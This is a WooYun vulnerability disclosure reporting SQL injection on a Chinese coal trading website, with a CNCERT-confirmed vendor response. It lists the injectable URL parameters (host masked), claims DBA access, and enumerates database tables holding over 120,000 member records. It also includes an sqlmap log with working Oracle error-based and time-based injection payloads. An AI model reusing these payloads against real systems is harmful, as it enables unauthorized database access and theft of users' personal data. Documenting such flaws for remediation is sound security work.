当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142382

漏洞标题:某煤炭网主站多处SQL注入漏洞(10W用户信息泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-23 23:08

修复时间:2015-11-08 16:22

公开时间:2015-11-08 16:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

秦皇岛煤炭网全站多处SQL注入十余万用户信息泄露

详细说明:

注入点:
**.**.**.**/include/DownloadFile.jsp?id=113
http://**.**.**.**/coalport/coalport_2j.jsp?id=O15
http://**.**.**.**/Trade/Price/2015/price_qhd_page.jsp?place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD
http://**.**.**.**/Trade/Price/title/more_price.jsp?type=31
sqlmap截图:

1.jpg


DBA权限

2.jpg


数据库信息:
从MEMBER | 123414 看出用户数据量

Database: COALTRADE
+--------------------------------+---------
| Table                          | Entries
+--------------------------------+---------
| USERLOGIN                      | 13212264
| LOGIN_ACTION_LOG               | 6092875
| MESSAGE_SEND_LOG               | 2650808
| COAL_FIELD_STORE               | 1100796
| AREA_COOPERATION               | 523481
| MYTABLE                        | 374343
| IPADDRESS                      | 374340
| COAL_STORE_DAY                 | 291673
| T_STORE_CURR                   | 178527
| COAL_OCEAN_PRICE_NEW           | 153783
| MEMBER                         | 123414
| FINANCE_REQUIRE_DAY            | 119043
| QTGK_DGYB                      | 117082
| OTHER_INFO                     | 106844
| CORF_STORE_NOW                 | 105724
| JTG_CORP_YARD_STORE_INFO       | 105003
| CFD_COALSTORENOW               | 101336
| PHONE_USER_VISIT               | 96875
| COAL_TRANSPORT_PRICE           | 96228
| M_SHIPSTEP                     | 84793
| FINANCE_PORT_DAY               | 74828
| CFDZCTZ                        | 64328
| INFO                           | 56825
| SYS_LOGIN_RECORD               | 54591
| M_TRAINUNLOAD                  | 54518
| COAL_OCEAN_PRICE               | 51660
| M_STORAGE                      | 49282
| COAL_PRICE                     | 48121
| CFD_PLAN_TO_BERTH_INFO         | 47133
| QTGK_LGCB                      | 32066
| JTG_PLAN_TO_BERTH_INFO         | 31144
| FINANCE_RAILWAY_DAY            | 30440
| COALINFO                       | 22754
| QTGK_ZGCB                      | 21266
| SCZC                           | 21182
| MESSAGE_MEMBER_ORDER_LIST      | 16069
| PRICE_GUANGZHOU_PORT           | 15861
| M_TRAIN                        | 15080
| BUSSINESS_MERGE                | 14913
| IPADDRESS_MAIN                 | 12975
| QTGK_HHG_CCRB                  | 11320
| INFO_LINE                      | 11162
| M_TRAINDAIL                    | 10468
| GET_IP_ADDRESS                 | 10378
| CFD_PORT_SHIP_WORK_INFO        | 10094
| MESSAGE_LOG                    | 9990
| JTG_UNLOAD_MONTH_NUM           | 9878
| SUPPLY_STORE                   | 9651
| CFD_LEV_SHIP_INFO_ONE          | 8828
| QUESTION                       | 8196
| JTG_INPORT_LOAD_INFO           | 7841
| SHIP_APPLY_INFO                | 7717
| M_ASSAY                        | 7536
| FINANCE_PORT_MONTH             | 7151
| PRICE_OCFI                     | 6998
| FOREIGN_COAL_PRICE             | 6717
| CFD_PLAN_TRAIN_CHECK           | 6591
| FINANCE_ELECTRIC_H1            | 6276
| FINANCE_COUNTRYCOAL_CN         | 5929
| T_B_SHIP                       | 5713
| CFDMTDJB                       | 5660
| M_TRAINSAMPLE                  | 5422
| JTG_PLAN_TRAIN_CHECK           | 5214
| FINANCE_PRODUCE_DAY            | 4416
| JTG_PORT_SHIP_WORK_INFO        | 4365
| TBL_LOGIN                      | 4312
| FINANCE_REQUIRE_MONTH          | 4224
| GS6_NOWSTORAGE                 | 4086
| JTG_LEV_SHIP_INFO              | 3623
| JTG_LEV_SHIP_INFO_ONE          | 3608
| FINANCE_RAILWAY_MONTH          | 3345
| FINANCE_PRODUCE_MONTH          | 3279
| MESSAGE_MEMBER_ORDER           | 3195
| MESSAGE_MEMBER_ORDER_PAY       | 3116
| CFD_STORECOLLEC                | 3080
| FINANCE_PRODUCE_YEAR           | 2933
| FINANCE_PRODUCE_CN             | 2852
| USERONLINE                     | 2841
| JTG_PLAN_CLASS_ARRIVE          | 2668
| COAL_BDI                       | 2645
| M_SHIPSAMPLE                   | 2380
| M_SHIPSAMPLEDAIL               | 2363
| COALPRICE_EVERYDAY             | 2320
| M_SHIPDOC                      | 2268
| LARGE_ENT_PORT_PRICE           | 2257
| CFD_STORECOLLECT_PAY           | 2212
| INFO_PHONE                     | 2073
| MEMBER_FEE                     | 1943
| COAL_INDEX                     | 1881
| QTGK_CCDT                      | 1539
| COAL_INFO                      | 1400
| FINANCE_ELECTRIC_CN            | 1280
| INTERNATIONAL_COAL_OCEAN_PRICE | 1265
| QTGK_MTJC                      | 1132
| QTGK_DJDC                      | 1099
| V_LITTERGOODS                  | 1060
| SHIP_IMPORTANT_INFO            | 971
| T_SEARCH_ENGINE                | 967
| JTG_MEMBER                     | 878
| M_XCJHB                        | 790
| MEMBER_RIGHT                   | 625
| QTGK_HHG_SCSB                  | 599
| CFDHZDAB                       | 549
| REALTRADE                      | 546
| FINANCE_SYSTEM_TABLE_TITLE     | 545
| Z2                             | 533
| INFO_KIND                      | 527
| MENU_SET                       | 498
| COAL_CHECK_RESULT              | 497
| SMJ_COAL_CHECK_RESULT          | 476
| COAL_CHECK_CON                 | 466
| COAL_STAND                     | 465
| MESSAGE_PHONE                  | 455
| QTGK_TLJG                      | 425
| ZSH_XCHY                       | 412
| DOWNLOAD_FILE                  | 397
| T_B_SHIPCOMPANY                | 392
| CFDMTDCB                       | 381
| JTG_CAROUT                     | 370
| YK_COAL_ACCOUNT                | 347
| GZG                            | 321
| JOB_INFO                       | 312
| CFDFFB                         | 288
| YW_ARCHIVES                    | 267
| QTGK_MTZC                      | 244
| T_B_COUNTRY                    | 240
| QTGK_MTXC                      | 229
| EMAILSERVER                    | 225
| JTG_CARIN                      | 204
| QTGK_GLJG                      | 193
| ZSH_ZCHY                       | 182
| COAL_BLENDING_DETAIL           | 180
| PLACE                          | 173
| LARGE_ENT_PORT_PRICE_TITLE     | 167
| CFDMZB                         | 145
| MESSAGE_GNHY                   | 137
| PAGE                           | 133
| QTGK_MZYB                      | 129
| LARGE_ENT_PORT_PRICE1          | 128
| FINANCE_SYSTEM_TABLE           | 123
| TODAYWEA                       | 121
| JTG_DMJG                       | 102
| COAL_BLENDING_CHARGE           | 100
| MENU                           | 99
| MEMBER_COMP                    | 98
| CFDGZB                         | 94
| FINANCE_LASTTIME               | 93
| FINANCE_ELECTRIC_MONTH         | 88
| JTG_COALINFO                   | 87
| COAL_BLENDING_TMP_REPORT       | 80
| MESSAGE_NOTE                   | 80
| JTG_SHIP_DAY_REPORT            | 79
| FREIGHTINFO                    | 78
| CFDQYMCGB                      | 70
| UPLOAD_FILE                    | 66
| LASTDATE                       | 65
| LOGIN_USERNAME                 | 63
| FINANCE_PRODUCE_YEAR_H1        | 60
| MEMBER_SHIP                    | 59
| CFDUSER_RIGHT                  | 49
| COAL_PRICE_TREND               | 48
| QTGK_JCHJ                      | 48
| ZSH_TRAIN_ARRIVE               | 43
| JTG_JMJG                       | 42
| CFDFZB                         | 37
| CUSTOM                         | 35
| MESSAGE_PACKAGE                | 35
| JTG_SHIPINFO                   | 34
| MEMBER_QH                      | 34
| MEMBER_TYPE                    | 31
| SHIPAGENT                      | 31
| MENU_COMPANY                   | 29
| TBL_GZRY                       | 29
| COAL_BLENDING_CONTRACT         | 28
| SYS_USER                       | 26
| M_MZ                           | 25
| MEM_CORP                       | 25
| SYS_MANAGER                    | 25
| FINANCE_TRANSFERRED_CN         | 24
| MESSAGE_PACKAGE_GROUP_LIST     | 24
| QTGK_ZXYB                      | 24
| VIEW_PUB_PRICE_INTV            | 24
| CORP_BERTH                     | 22
| HOTPOINT                       | 21
| PBCATEDT                       | 21
| PBCATFMT                       | 20
| CFD_PLAN_CLASS_ARRIVE          | 19
| MEMBER_CORP                    | 19
| COAL_CHECK                     | 18
| DOWNLOAD_FILE_TYPE             | 18
| PERIODICAL_ORDER_DETAIL        | 17
| YK_UPLOAD                      | 17
| CFDDCF                         | 16
| CFDPAGE                        | 16
| HISTORICAL_DATA_DOWNLOAD       | 16
| IMAGE_POSITION                 | 16
| INFO_SUGGESTION                | 16
| JTG_KSJG                       | 16
| MESSAGE_MEMBER_GROUP           | 16
| PERIODICAL_ORDER               | 16
| PROJECT                        | 15
| USER_REGISTER                  | 15
| MSGBOARD                       | 14
| POLL                           | 13
| CHANNEL_INFO                   | 12
| QTGK_GLDC                      | 12
| SYS_SEQUENCE_LIST              | 12
| C_CHANNEL                      | 11
| AREA_COOPERATION_TYPE          | 10
| HUANENG_CX                     | 10
| SMJUSERS                       | 10
| TOPINFO                        | 10
| ZSH_MESSAGE                    | 10
| ZSH_SHIP                       | 10
| T_B_SHIPCONTRY                 | 9
| YHM                            | 9
| LARGE_ENT_PORT_PRICE_TITLE1    | 8
| PROJECT_ATTACHMENT             | 8
| REALTRADE1                     | 8
| SCHEDULE                       | 8
| USERS                          | 8
| ZMGPJY_CATALOGUE               | 8
| CFDJGMTFF                      | 7
| CFDUSER                        | 7
| PROJECT_PLAN                   | 7
| T_B_SHIPTYPE                   | 7
| ZMGPJY_PRICE                   | 7
| FINANCE_PORT_NAME              | 6
| YW_POWERPAGE                   | 6
| YW_ROLE_RIGHTS_ASSIGNMENT      | 6
| ZSH_COALTYPE                   | 6
| CFDDCFFB                       | 5
| CFDUSER_TYPE                   | 5
| SHIP_TRADE_INFO                | 5
| TBL_RYLB                       | 5
| TBL_ZLDW                       | 5
| CFDDCFLB                       | 4
| COAL_BLENDING_CHARGE_RATE      | 4
| HYK_BUSINESS                   | 4
| HYK_TAX_MONTH                  | 4
| JTG_CORP                       | 4
| MESSAGE_MEMBER_GROUP_LIST      | 4
| MESSAGE_PACKAGE_GROUP          | 4
| HYK_TAX_YEAR                   | 3
| INFO_CONTENT_URL               | 3
| PHONE_CHANNEL_TYPE             | 3
| QTGK_MEMBER                    | 3
| RESEARCH                       | 3
| RESEARCHDEVOTE                 | 3
| TEXT                           | 3
| CFDGZFLB                       | 2
| FINANCE_SYSTEM_DP              | 2
| SMJ_COMP                       | 2
| SYS_PARAM                      | 2
| TBL_SFLB                       | 2
| YK_PORT_SHIP_WORK_INFO         | 2
| BOAT                           | 1
| MESSAGE_EMAIL                  | 1
| NOCHECKIP_MEMBER               | 1
| OUT_PHONE                      | 1
| TBL_CKDH                       | 1
| TEL_USER                       | 1
| YW_OPERATOR                    | 1
| YW_ROLE_ASSIGNMENT             | 1
| YW_ROLES                       | 1
| ZMGPJY_DETAIL                  | 1
| ZMGPJY_REMARK                  | 1
+--------------------------------+---------

漏洞证明:

sqlmap全过程

[14:45:16] [INFO] testing connection to the target URL
[14:45:17] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
[14:45:17] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[14:45:18] [INFO] target URL is stable
[14:45:18] [INFO] testing if GET parameter 'place' is dynamic
[14:45:18] [WARNING] GET parameter 'place' does not appear dynamic
[14:45:18] [INFO] heuristic (basic) test shows that GET parameter 'place' might
be injectable (possible DBMS: 'Oracle')
[14:45:18] [INFO] testing for SQL injection on GET parameter 'place'
heuristic (parsing) test showed that the back-end DBMS could be 'Oracle'. Do you
 want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Oracle' extending provided level (1) and r
isk (1) values? [Y/n]
[14:45:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:45:25] [INFO] testing 'Oracle boolean-based blind - Parameter replace (origi
nal value)'
[14:45:25] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY cl
auses'
[14:45:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[14:45:26] [INFO] GET parameter 'place' is 'Oracle AND error-based - WHERE or HA
VING clause (XMLType)' injectable
[14:45:26] [INFO] testing 'Oracle inline queries'
[14:45:26] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[14:45:27] [INFO] testing 'Oracle stacked queries (heavy query)'
[14:45:27] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[14:45:27] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[14:45:27] [INFO] testing 'Oracle AND time-based blind'
[14:45:37] [INFO] GET parameter 'place' seems to be 'Oracle AND time-based blind
' injectable
[14:45:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:45:37] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[14:45:40] [INFO] target URL appears to be UNION injectable with 1 columns
[14:45:41] [WARNING] if UNION based SQL injection is not detected, please consid
er and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
GET parameter 'place' is vulnerable. Do you want to keep testing the others (if
any)? [y/N]
sqlmap identified the following injection points with a total of 57 HTTP(s) requ
ests:
---
Parameter: place (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD' AND 6
414=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(122)||CHR(11
3)||CHR(113)||(SELECT (CASE WHEN (6414=6414) THEN 1 ELSE 0 END) FROM DUAL)||CHR(
113)||CHR(98)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'ghBF'='gh
BF
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: place=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD' AND 6
223=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(97)||CHR(114)||CHR(112),5) AND 'yDnX'
='yDnX
---
[14:45:42] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, JSP
back-end DBMS: Oracle

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-24 16:21

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河北分中心,由河北分中心后续协调网站管理单位处置。

最新状态:

暂无